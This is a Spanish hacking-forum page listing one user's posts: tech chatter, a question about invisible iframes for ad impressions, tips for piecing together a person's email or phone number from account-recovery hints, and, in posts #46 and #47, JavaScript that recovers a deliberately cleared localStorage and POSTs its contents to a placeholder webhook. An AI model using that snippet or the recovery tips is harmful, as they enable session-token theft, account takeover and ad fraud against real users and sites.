Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Xyzed

#41
Cita de: el-brujo en 16 Junio 2021, 11:13 AM
No es legal, utilizar un ifarme ocultos o invisbles o de tamaño. Pero aunque lo fuera, tampoco funcionaría. No se cargará el código del anuncio y tampoco habrá click.

Google no paga por impresiones sólo por clics. Cargar un iframe no es una "visita", sería una impresión y no hay clic"
Ya, buenísimo, gracias por la respuesta.

Consideraba que el pago era por la impresión simplemente.

Saludos.
#42
Desarrollo Web / Google ADS | ¿Iframes pagos?
16 Junio 2021, 08:39 AM
Hola.

Nunca me interesó mucho el asunto de poner publicidad en un sitio web a cambio de unos dólarillos, pero hoy me saltó la curiosidad acerca de una puntual pregunta;

Imaginando que tenemos un sitio (A), en el cual se encuentran las publicidades de Google, y un sitio (B) donde coloco unos iframes invisibles apuntando al sitio A.

¿Google considera esto como una visita real?, ¿o utiliza una simple validación rechazando las visitas con algo como: "Access-Control-Allow-Origin"?

Saludos.
#43
Windows / Re: Windows 11
15 Junio 2021, 23:48 PM
Hola.

Está como tendencia en Twitter "Windows 11", donde se aportan supuestas filtraciones del nuevo Windows (o nueva actualización del 10 nada más, quien sabe).

ADSLZONE: Filtrada la ISO de Windows 11.


Saludos.
#44
Cita de: Pabloang en 22 Julio 2020, 07:59 AM
Hola, logré conseguir las credenciales de una cuenta de Google pero al ingresar tiene la doble verificación y me aparece que no reconoce el dispositivo desde el que ingrese y me pide que verificar con el código que van a enviar pero no lo tengo alguien sabe como puedo saltar la verificación, gracias
Hola.

La doble verificación, verificación en dos pasos o como quieras llamarle, es una extensión de seguridad que puedes utilizar para proteger tu cuenta.
No solo te pedirá el código porque estás accediendo desde otro dispositivo, sino que siempre te lo pedirá, a menos que permitas el acceso desde tu ordenador/celular sin pedir la autentificación.
No podrás acceder a la cuenta, debido a que no hay forma alguna de "Bypassear" el sistema de autenticación en dos pasos.
Es lo más seguro que existe hoy en día al igual que las llaves físicas que se utilizan para permitir el acceso.

Saludos.
#45
Hola.

Hay alguna que otra manera, tienes que usar la lógica que utilizan dichos servicios.

Por ejemplo:

Métodos de recuperación utilizados en la plataforma.

Cantidad de caracteres visibles al intentar recuperar: Todos los servicios ofrecen recuperar contraseña.
Mientras que algunos te muestran ***ed@ejemplo.com || otros te dan: xyz**@ejemplo.com

Información a tu favor en la red social: Sea la red social que sea, siempre hay data de importancia que te puede servir.

Buscar a fondo: Si conseguís un correo podes con esto conseguir un teléfono y viceversa.

Por otra parte, podes optar por utilizar la herramienta OSINT para obtener información.
#46
Actualizo: Ya lo pude resolver, simplemente pasando el parametro exacto a buscar en LocalStorage funciona sin problemas:


Código (javascript) [Seleccionar]

//cambiar:
var msg = LocalStorage;
//por:
var msg = LocalStorage.getItem('valor');
//Al parecer al justificar exactamente que quieres enviar lo hace sin problemas.


Saludos.
#47
Hola.

Estuve informandome acerca del funcionamiento de LocalStorage, siempre me maneje más por el lado de las cookies y estoy obteniendo un error al intentar enviar mediante una webhook desde la consola un valor del mencionado almacenador de información;

Código (javascript) [Seleccionar]

function getLocalStoragePropertyDescriptor() {
  const iframe = document.createElement('iframe');
  document.head.append(iframe);
  const pd = Object.getOwnPropertyDescriptor(iframe.contentWindow, 'localStorage');
  iframe.remove();
  return pd;
}

Object.defineProperty(window, 'localStorage', getLocalStoragePropertyDescriptor());
const localStorage = getLocalStoragePropertyDescriptor().get.call(window);



La aplicación al iniciarse limpia y no permite de alguna forma acceder a LocalStorage, por lo tanto utilice esa función que encontré navegando para poder acceder al LocalStorage.

Para corroborar que la función mencionada este en correcto funcionamiento hice una simple impresión desde la consola con:

Código (javascript) [Seleccionar]

console.log(LocalStorage);


Esto devuelve lo buscado sin ningún problema, por lo tanto la función getLocalStoragePropertyDescriptor está bien.

Luego de eso, intente desde la misma consola poder enviar un webhook, esto funciona correctamente, pero al pasar el contenido de "LocalStorage" a una variable para ser enviado, recibo el error 404.
Este es el código;

Código (javascript) [Seleccionar]

function enviarhook() {
      var request = new XMLHttpRequest();
      request.open("POST", "direcciondelhook");

      request.setRequestHeader('Content-type', 'application/json');

      var msg = LocalStorage; //Linea que causa el error, msg es el contenido que sera enviado mediante POST al webhook. Si en vez de "LocalStorage" le atribuyo cualquier otro contenido, se envia correctamente, pero en cambio si esta tal cual lo presente aqui, recibo un error 400 "POST".

      var params = {
        content: msg
      }

      request.send(JSON.stringify(params));
    }


Quizás esto está prohibido por un tema de seguridad, pero puede ser que este empleando algo mal por lo tanto realizo el post aquí.

La pregunta es; ¿Cuál es el causante del error?

Saludos.
#48
Cita de: el-brujo en  9 Junio 2021, 18:04 PM
Lo que creo que tendría que hacer Mercadona y cualquier otra empresa es encargar a una empresa externa que se dedique a ello para hacer una auditoría de seguridad. Saldrá quizás más caro, pero los resultado serán mas buenos.

Una sola persona no es suficiente para hacer hacer una prueba de pentesting, aunque entiendo según leo en la oferta, que que la persona se unirá a un equipo de más personas...
Exactamente, eso es algo más eficaz, HackerOne o similares donde das la posibilidad de protección a cambio de un dinerillo, que en este caso en particular para Mercadona, es un vuelto.

Es más bien una inversión que un gasto.

Siempre me pregunté si la información detallada en la aplicación web de la mencionada organización es real, es un delirio la cantidad de vulnerabilidades con las que contaban varias multinacionales y los millones que se ahorraron por haber parchado sus errores a tiempo antes de un ataque.
#49
Dudas Generales / Re: Pregunta
9 Junio 2021, 10:45 AM
Hola.

Coincido con @el-brujo, no se entiende bien tu pregunta, no está bien redactada.

En Discord no puedes ver tu propia IP, así que si alguien accede a tu cuenta si se las prestaste, no podrá visualizarla.

En el correo sea falso o verdadero, si la persona crea el mismo o accede de alguna u otra forma y tu intentas acceder, puede ser que el envió de mensaje de advertencia de entrada, muestre tu dirección IP.

Ese es el sistema de validación de Discord, si se intenta loguear en tu cuenta desde un acceso "desconocido", tendrás que validar la IP (qué se ve en el mensaje enviado por Discord).

Mediante Discord por lo que se tiene conocimiento publico (quizás existe un 0day, nunca se sabe), no es posible que obtengan tu dirección IP a menos que descargues algo o entres a alguna dirección web compartida por otro usuario.

Saludos.
#50
Hola.

Hace poco preguntaron lo mismo y le dieron varias respuestas, utilizar la opción buscar del foro antes de re-postear lo mismo.

Por otra parte, hiciste como 5 posts con la misma pregunta, te advertirán.

Saludos.